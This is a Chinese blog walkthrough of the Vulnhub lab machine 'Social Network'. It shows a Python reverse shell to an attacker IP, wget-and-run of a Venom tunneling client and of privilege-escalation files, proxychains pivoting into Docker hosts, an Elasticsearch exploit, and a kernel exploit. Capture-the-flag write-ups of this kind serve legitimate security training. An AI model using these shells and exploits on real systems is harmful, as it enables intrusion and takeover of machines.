Vulnhub_BOREDHACKERBLOG: SOCIAL NETWORK

主机发现

arp-scan -l

扫描结果

端口发现

nmap -p- 192.168.31.112  

扫描结果

详细信息

nmap -p22,5000 192.168.31.112 -sV

在这里插入图片描述
发现是python的环境
然后我们可以去尝试的登录相关网页发现信息
在这里插入图片描述

扫描目录

然后我们使用目录扫描工具gobuster

gobuster dir -u http://192.168.31.112:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

在这里插入图片描述
访问这个页面
在这里插入图片描述

提取重要信息:exec函数

反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.31.236",3333));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

我这里使用的是python的反弹shell,然后kali开启监听

nc -nvlp 3333

在这里插入图片描述
直接就是root貌似没那么简单,继续看文件

容器判断

在这里插入图片描述
使用ls /.dockerenv查看是否存在dockerenv文件。
在这里插入图片描述

使用cat /proc/1/cgroup查看
在这里插入图片描述
判定是docker容器

继续渗透

查看ip
在这里插入图片描述

主机发现

for i in $(seq 1 10); do ping -c 1 172.17.0.$i; done 

在这里插入图片描述

内网穿透

工具: venom http服务
服务器端(kali):./admin_linux_x64 -lport 4444
在这里插入图片描述
然后启动http服务python3 -m http.server 80
在这里插入图片描述
客户端(靶机):wget http://192.168.31.236/b (这个文件b是客户端的文件,我为了方便把名字改了)
在这里插入图片描述
增加执行权限
chmod +x b
执行

 ./b -rhost 192.168.31.236 -rport 4444

在这里插入图片描述
在这里插入图片描述
修改代理

sudo vi /etc/proxychains4.conf 

在这里插入图片描述

渗透继续

proxychains nmap -Pn -sT 172.17.0.1

在这里插入图片描述
发现端口
在这里插入图片描述

proxychains nmap -Pn -sT -p22,5000 -sV 172.17.0.1 

在这里插入图片描述
尝试访问页面(记得挂代理)
在这里插入图片描述
在这里插入图片描述

渗透继续

proxychains nmap -Pn -sT 172.17.0.3

在这里插入图片描述
查看详细信息
在这里插入图片描述
Elasticsearch 进行额外的关注,看看他有没有相关的漏洞

searchsploit Elasticsearch 
cp /usr/share/exploitdb/exploits/linux/remote/36337.py .

然后尝试直接利用

proxychains python2 36337.py 172.17.0.3

但是发现不能执行命令
在这里插入图片描述
从网上查阅资料
先得执行这样的命令

 proxychains curl -XPOST 'http://172.17.0.3:9200/twitter/user/yren' -d '{ "name" : "BA" }'

然后再去使用我们的exp
proxychains python2 36337.py 172.17.0.3
在这里插入图片描述
信息收集
在这里插入图片描述
密码破解
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
尝试去登录(有22端口的)
在这里插入图片描述

提权

内核提权
在这里插入图片描述
搜索一下
在这里插入图片描述

cp /usr/share/exploitdb/exploits/linux/local/37292.c .  

查看:这个文件,发现一个问题,没有gcc,而且这个文件是二次调用gcc,不能在外面编译。
想法:所以我们将里面的需要gcc编译的东西删除,然后另外添加即可
删除!相关的代码,最后结果如图:
在这里插入图片描述
查找此文件的其他需要的部分:

locate ofs-lib.so

拷贝到当前目录
在这里插入图片描述

在这里插入图片描述
然后就是启动http服务,将我们的提权文件传输过去

wget http://192.168.31.236:811/ofs-lib.so 
wget http://192.168.31.236:811/exp

为了执行的成功

移动 mv * /tmp/
chmod +x exp 

./exp
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_45725490

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值